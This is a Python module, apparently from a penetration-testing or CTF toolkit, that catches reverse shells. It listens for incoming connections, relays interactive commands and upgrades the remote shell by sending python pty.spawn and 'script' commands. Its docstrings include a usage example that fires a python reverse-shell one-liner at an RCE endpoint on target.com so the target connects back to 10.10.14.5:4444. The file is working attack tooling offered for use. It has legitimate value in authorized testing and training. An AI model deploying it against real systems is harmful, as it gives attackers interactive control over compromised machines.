"""
Shell catcher utility for POCs.
Catch reverse shells directly in your exploit script.
"""
import builtins
import contextlib
import os
import readline # For command history
import select
import socket
import sys
import termios
import threading
import time
import tty
from your_project.utils.output import out
[docs]
class ShellCatcher:
"""
Simple reverse shell catcher for POCs.
Examples:
.. code-block:: python
from utils.shell_catcher import ShellCatcher
# Start listener in background
catcher = ShellCatcher(4444)
catcher.start()
# Trigger your exploit here
exploit_target()
# Wait for shell and interact
if catcher.wait_for_shell(timeout=10):
catcher.interact()
"""
def __init__(self, port, host="0.0.0.0"):
self.host = host
self.port = port
self.listener = None
self.client = None
self.thread = None
self.shell_caught = False
self.stabilized = False
[docs]
def start(self):
"""Start listener in background thread"""
self.thread = threading.Thread(target=self._listen, daemon=True)
self.thread.start()
out.info(f"Shell catcher listening on {self.host}:{self.port}")
def _listen(self):
"""Background listener thread"""
try:
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener.bind((self.host, self.port))
self.listener.listen(1)
self.client, addr = self.listener.accept()
out.success(f"Shell caught from {addr[0]}:{addr[1]}")
self.shell_caught = True
except Exception as e:
out.error(f"Listener error: {e}")
[docs]
def wait_for_shell(self, timeout=30):
"""Wait for shell to connect"""
out.status(f"Waiting for shell (timeout: {timeout}s)...")
start = time.time()
while time.time() - start < timeout:
if self.shell_caught:
return True
time.sleep(0.5)
out.error("Timeout waiting for shell")
return False
[docs]
def interact(self, use_raw=None):
"""Interact with caught shell"""
if not self.client:
out.error("No shell connected")
return
# Auto-enable raw mode if shell is stabilized (unless explicitly set)
if use_raw is None:
use_raw = self.stabilized
out.success("Entering interactive shell (type 'exit' to exit)")
if not self.stabilized:
out.info("Tip: Run catcher.stabilize() first for better shell")
elif use_raw:
out.info("Raw TTY mode enabled - full interactivity!")
print()
# Save terminal settings
if use_raw and sys.stdin.isatty():
old_tty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
self._raw_interact()
finally:
# Restore terminal immediately without waiting
try:
# Try TCSANOW first (immediate, no waiting)
termios.tcsetattr(sys.stdin, termios.TCSANOW, old_tty)
except: # noqa: E722
# Fallback to TCSAFLUSH if TCSANOW fails
with contextlib.suppress(builtins.BaseException):
termios.tcsetattr(sys.stdin, termios.TCSAFLUSH, old_tty)
# Print newline to clean up terminal display
sys.stdout.write("\n")
sys.stdout.flush()
else:
self._normal_interact()
def _normal_interact(self):
"""Normal interaction with readline support"""
try:
# Enable readline for history
readline.parse_and_bind("tab: complete")
readline.parse_and_bind("set editing-mode emacs")
while True:
# Check if data available from shell
ready = select.select([self.client, sys.stdin], [], [], 0.1)
# Data from shell
if self.client in ready[0]:
data = self.client.recv(4096)
if not data:
break
sys.stdout.write(data.decode("utf-8", errors="replace"))
sys.stdout.flush()
# Input from user
if sys.stdin in ready[0]:
cmd = sys.stdin.readline()
self.client.send(cmd.encode())
except KeyboardInterrupt:
out.warning("\nExiting shell")
except Exception as e:
out.error(f"Shell error: {e}")
finally:
self.cleanup()
def _raw_interact(self):
"""Raw mode interaction (better for PTY shells)"""
connection_closed = False
# Buffer to detect exit commands
input_buffer = b""
try:
while True:
# Check for closed connection using exceptfds
ready = select.select([self.client, sys.stdin], [], [self.client], 0.1)
# Connection error/closed
if self.client in ready[2]:
connection_closed = True
break
if self.client in ready[0]:
try:
data = self.client.recv(4096)
if not data:
connection_closed = True
break
os.write(sys.stdout.fileno(), data)
except (ConnectionResetError, BrokenPipeError, OSError):
connection_closed = True
break
if sys.stdin in ready[0]:
try:
data = os.read(sys.stdin.fileno(), 4096)
if not data:
break
# Buffer last 10 bytes to detect exit commands
input_buffer = (input_buffer + data)[-10:]
# Send data to remote
self.client.send(data)
# Check if user typed exit command (with newline/return)
if b"exit\n" in input_buffer or b"exit\r" in input_buffer:
os.write(
sys.stdout.fileno(),
b"[*] Exit detected, closing gracefully...\r\n",
)
# Give remote a moment to process exit and close
time.sleep(0.2)
# Check if remote closed
try:
ready = select.select([self.client], [], [], 0.1)
if self.client in ready[0]:
data = self.client.recv(4096)
if data:
os.write(sys.stdout.fileno(), data)
except: # noqa: E722
pass
connection_closed = True
break
except (ConnectionResetError, BrokenPipeError, OSError):
connection_closed = True
break
except KeyboardInterrupt:
# Send newline to remote shell before exiting
with contextlib.suppress(builtins.BaseException):
self.client.send(b"\n")
except Exception:
pass
finally:
# Print message before terminal restoration
if connection_closed:
# Write directly to avoid buffering issues
os.write(sys.stdout.fileno(), b"\r\n[*] Connection closed\r\n")
[docs]
def send_command(self, cmd, wait_response=True, timeout=2):
"""Send a single command and optionally get response"""
if not self.client:
return None
self.client.send(f"{cmd}\n".encode())
if wait_response:
# Collect output for timeout seconds
output = b""
start = time.time()
while time.time() - start < timeout:
ready = select.select([self.client], [], [], 0.1)
if self.client in ready[0]:
chunk = self.client.recv(4096)
if not chunk:
break
output += chunk
return output.decode("utf-8", errors="replace")
return None
[docs]
def stabilize(self):
"""Try to stabilize/upgrade the shell"""
if not self.client:
out.error("No shell connected")
return False
out.info("Attempting shell stabilization...")
# Try Python PTY spawn
out.status("Trying Python PTY upgrade...")
response = self.send_command("which python python2 python3", timeout=1)
if "python" in response.lower():
# Find which python is available
if "python3" in response:
py = "python3"
elif "python2" in response:
py = "python2"
else:
py = "python"
self.send_command(f"{py} -c 'import pty;pty.spawn(\"/bin/bash\")'")
time.sleep(0.5)
# Set terminal settings
self.send_command("export TERM=xterm-256color")
self.send_command("export SHELL=/bin/bash")
# Get local terminal size and apply to remote
try:
import shutil
cols, rows = shutil.get_terminal_size()
self.send_command(f"stty rows {rows} cols {cols}")
out.info(f"Terminal size set to {rows}x{cols}")
except: # noqa: E722
out.warning(
"Could not detect terminal size - use: stty rows <rows> cols <cols>"
)
# Clear any buffered output from setup commands
self._drain_output()
# Send newline to trigger prompt (don't drain after - we want to see the prompt!)
self.client.send(b"\n")
time.sleep(0.3)
out.success("Shell upgraded to PTY")
self.stabilized = True
return True
# Try script command if python not available
out.status("Python not found, trying script command...")
response = self.send_command("which script", timeout=1)
if "script" in response.lower():
self.send_command("script -q /dev/null")
time.sleep(0.5)
self.send_command("export TERM=xterm-256color")
# Set terminal size for script-based TTY too
try:
import shutil
cols, rows = shutil.get_terminal_size()
self.send_command(f"stty rows {rows} cols {cols}")
out.info(f"Terminal size set to {rows}x{cols}")
except: # noqa: E722
pass
# Clear buffered output from setup commands
self._drain_output()
# Send newline to trigger prompt (don't drain after - we want to see the prompt!)
self.client.send(b"\n")
time.sleep(0.3)
out.success("Shell upgraded using script")
self.stabilized = True
return True
out.warning("Could not upgrade shell (no python/script found)")
return False
def _drain_output(self, timeout=0.5):
"""Drain any pending output from the shell"""
start = time.time()
while time.time() - start < timeout:
ready = select.select([self.client], [], [], 0.1)
if self.client in ready[0]:
try:
self.client.recv(4096)
except: # noqa: E722
break
else:
break
[docs]
def cleanup(self):
"""Clean up connections"""
if self.client:
try:
# Set socket timeout to prevent hanging on close
self.client.settimeout(0.1)
# Try graceful shutdown first
with contextlib.suppress(builtins.BaseException):
self.client.shutdown(socket.SHUT_RDWR)
self.client.close()
except: # noqa: E722
pass
self.client = None
if self.listener:
with contextlib.suppress(builtins.BaseException):
self.listener.close()
self.listener = None
[docs]
def quick_catch(port=4444, trigger_func=None, trigger_delay=1):
"""
Quick helper to catch a shell with optional trigger function.
The trigger function should exploit the RCE vulnerability to make the
target execute a reverse shell that connects back to your listener.
Examples:
.. code-block:: python
from your_project.utils.reverse_shells import python_oneliner
def trigger():
# Send reverse shell command to vulnerable RCE endpoint
cmd = python_oneliner('10.10.14.5', 4444)
# This makes the TARGET execute the reverse shell
requests.get(f"http://target.com/vulnerable?cmd={cmd}")
quick_catch(4444, trigger_func=trigger)
# Or without a trigger (if you trigger manually):
quick_catch(4444) # Then trigger exploit separately
"""
catcher = ShellCatcher(port)
catcher.start()
if trigger_func:
out.status(f"Waiting {trigger_delay}s before triggering exploit...")
time.sleep(trigger_delay)
out.info("Triggering exploit...")
trigger_func()
if catcher.wait_for_shell():
catcher.interact()
else:
out.error("Failed to catch shell")
return catcher
[docs]
def auto_shell(port=4444, wait_timeout=30):
"""
Context manager for shell catching with auto-wait.
Examples:
.. code-block:: python
with auto_shell(4444) as catcher:
# Trigger exploit
exploit_target()
# Automatically waits for shell
if catcher.shell_caught:
catcher.send_command("id")
catcher.interact()
"""
class ShellContext:
def __init__(self, port, timeout):
self.catcher = ShellCatcher(port)
self.timeout = timeout
self._waited = False # Track if we've already waited
def __enter__(self):
self.catcher.start()
return self
def __exit__(self, *args):
# Cleanup immediately, no delay needed
self.catcher.cleanup()
def wait_and_interact(self):
"""Wait for shell and automatically enter interactive mode"""
if self.catcher.wait_for_shell(timeout=self.timeout):
self.catcher.interact()
return True
return False
def send_command(self, cmd, wait_response=True, timeout=2):
"""Proxy to catcher's send_command"""
return self.catcher.send_command(cmd, wait_response, timeout)
def interact(self):
"""Proxy to catcher's interact"""
return self.catcher.interact()
def stabilize(self):
"""Proxy to catcher's stabilize"""
return self.catcher.stabilize()
@property
def shell_caught(self):
"""Check if shell is caught, with auto-wait"""
if not self.catcher.shell_caught and not self._waited:
# Wait for shell if not caught yet (only once)
self._waited = True
self.catcher.wait_for_shell(timeout=self.timeout)
return self.catcher.shell_caught
return ShellContext(port, wait_timeout)